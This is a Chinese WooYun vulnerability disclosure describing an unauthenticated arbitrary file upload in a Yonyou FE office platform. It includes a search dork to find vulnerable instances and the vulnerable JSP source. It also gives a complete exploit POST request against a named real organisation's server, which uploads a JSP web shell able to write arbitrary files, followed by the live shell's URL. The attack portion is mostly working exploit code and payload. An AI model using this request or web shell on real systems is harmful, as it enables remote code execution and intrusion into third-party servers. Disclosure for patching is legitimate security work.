当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071838

漏洞标题:用友某办公平台任意文件上传导致代码执行漏洞(无需登录)

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2014-08-10 17:56

修复时间:2014-11-05 17:58

公开时间:2014-11-05 17:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-10: 细节已通知厂商并且等待厂商处理中
2014-08-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-05: 细节向公众公开

简要描述:

详细说明:

上一枚: WooYun: 用友某办公平台任意文件上传导致代码执行漏洞(全版本)
intitle:"fe协作"
看问题代码
在\system\mediafile\fileupload.jsp中

<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*" errorPage="" %>
<%@ page import="java.io.*"%> 
<%@ page import="java.util.*"%> 
<%@ page import="fe.util.*"%> 
<%@ page import="fe.upload.*"%>
<jsp:directive.page import="fe.sys.User"/>
<jsp:directive.page import="fe.res.ResourceManage"/> 
<%
	String path = request.getParameter("path");
	String state=request.getParameter("state");
	request.setCharacterEncoding("GBK");
	if(state==null || "".equals(state)){
		UploadFile up=new UploadFile(request);
		up.setSavePath(path);
		String message=up.writeFile(true);
		%>
			<script language="javascript">
				alert("<%=message%>");
				var reloadSrc1=opener;
				var href=reloadSrc1.location.href;
				var index=href.indexOf("done");
				if(index>0)
				href=href.substring(0,index);
				reloadSrc1.location.href=href;
				window.close();	
			</script>
		<%
		return;
	}
%>
<HTML>
<HEAD>
<TITLE>文件选择</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<style type="text/css">
body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}
body {padding:5px}
</style>
<link href="/style1.css" rel="stylesheet" type="text/css">
<script language="JavaScript" src="/js35/XHConn.js"></script>
<script language="JavaScript">
//var filepath="";
var img=null; 
	function ok(){
		var fileName=document.all.file1.value;
		if(fileName.indexOf("\\")!=-1)
			fileName=fileName.substring(fileName.lastIndexOf("\\")+1);		
		if(fileName==null || fileName==""){			
			alert("请选择上传文件!");
			return;
		}
		else{
		    if(fileName.toLowerCase().lastIndexOf(".doc")!=fileName.length-4){
		      alert("系统只是支持上传DOC文件,请选择其他文件!");
		      return;
		    }
			var myConn = new XHConn();
			if(myConn){
				 myConn.connect("checkfile.jsp", "POST", "type=file&fileName="+fileName+"&path=<%=path %>", checkName);
			}		
		}		
	}	
	function checkName(oXML){
		var state=oXML.responseText;	
		if(state.indexOf("#hasFile")!=-1){
			if(!window.confirm("文件已存在,是否覆盖?")){
				return;
			}
		}		
		document.all.form1.submit();
		document.all.divProcessing.style.display="inline";
	}
</script>
<BODY bgColor="#E0F0FE" style="margin:0px;">
<form name="form1" action="fileupload.jsp?path=<%=path %>" method="post" enctype="multipart/form-data">
<table width="317" height="81" border=0 align=center cellpadding=0 cellspacing=0>
<tr>
  <td>上传文件不能大于10M(只能上传DOC文件)</td>
</tr>
<tr>
	<td width="317" height="56">
	
	<fieldset>
	<legend>文件来源</legend>
	<table border=0 cellpadding=0 cellspacing=0 width="100%">
		<tr>
			<td align="right"><input type="file" name="file1" id="file1"size="35"></td>
		</tr>
	</table>
	</fieldset>	</td>
</tr>
<tr><td height=5>&nbsp;</td></tr>
<tr><td height=5>&nbsp;</td></tr>
<tr><td height="20" align=right><input class="singleInputButton" type="button" value='  确定  ' id=Ok onclick="ok()">&nbsp;&nbsp;<input class="singleInputButton" type=button value='  取消  ' onclick="window.close();"></td></tr>
</table>
</form>
<div id=divProcessing style="width:200px;height:30px;position:absolute;left:70px;top:30px;display:none">
<table border=0 cellpadding=0 cellspacing=1 bgcolor="#000000" width="100%" height="100%"><tr><td bgcolor=#3A6EA5><marquee align="middle" behavior="alternate" scrollamount="5"><font color=#FFFFFF>...文件上传中...请等待...</font></marquee></td></tr></table>
</div>
</body>
</html>


分析如下:

String path = request.getParameter("path");//获取路径
	String state=request.getParameter("state");//状态
	request.setCharacterEncoding("GBK");
	if(state==null || "".equals(state)){
		UploadFile up=new UploadFile(request); //直接获取reuqest包
		up.setSavePath(path); //保存到目标路径


利用证明如下:

POST /system/mediafile/fileupload.jsp?path=D:\FE\jboss\server\default\.\deploy\fe.war\ HTTP/1.1
Host: oa.peizheng.net.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.peizheng.net.cn/system/mediafile/fileupload.jsp?path=1&state=2
Cookie: JSESSIONID=197566F74F854A9E06551298A76CCCE8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------155811815622246
Content-Length: 2215
-----------------------------155811815622246
Content-Disposition: form-data; name="file1"; filename="test.jsp"
Content-Type: application/msword
<%@page contentType="text/html;charset=gb2312"%>   
<%@page import="java.io.*,java.util.*,java.net.*"%>   
<html>   
  <head>   
    <title>JspDo Code By Xiao.3</title>   
    <style type="text/css">   
     body { color:red; font-size:12px; background-color:white; }   
    </style>   
  </head>   
  <body>   
  <%   
   if(request.getParameter("context")!=null)   
   {   
   String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");   
   String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");   
   OutputStream pt = null;   
        try {   
            pt = new FileOutputStream(path);   
            pt.write(context.getBytes());   
            out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='µã»÷¿ÉÒÔתµ½ÉÏ´«µÄÎļþÒ³Ãæ!'>ÉÏ´«³É¹¦!</font></a>");   
        } catch (FileNotFoundException ex2) {   
            out.println("<font color='red'>ÉÏ´«Ê§°Ü!</font>");   
        } catch (IOException ex) {   
            out.println("<font color='red'>ÉÏ´«Ê§°Ü!</font>");   
        } finally {   
            try {   
                pt.close();   
            } catch (IOException ex3) {   
                out.println("<font color='red'>ÉÏ´«Ê§°Ü!</font>");   
            }   
        }   
}   
  %>   
    <form name="frmUpload" method="post" action="">   
    <font color="blue">±¾ÎļþµÄ·¾¶:</font><%out.print(request.getRealPath(request.getServletPath())); %>   
    <br>   
    <br>   
    <font color="blue">ÉÏ´«Îļþ·¾¶:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>">   
    <br>   
    <br>   
    ÉÏ´«ÎļþÄÚÈÝ:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>   
    <br>   
    <br>   
    <input type="submit" name="btnSubmit" value="Upload">   
    </form>   
  </body>   
</html>  
-----------------------------155811815622246--


shell直接在根目录当中,为test.jsp
http://oa.peizheng.net.cn/test.jsp

]XJRNIREAU[83[2WMXXXSFJ.jpg

漏洞证明:

http://oa.peizheng.net.cn/test.jsp

]XJRNIREAU[83[2WMXXXSFJ.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-05 17:58

厂商回复:

最新状态:

暂无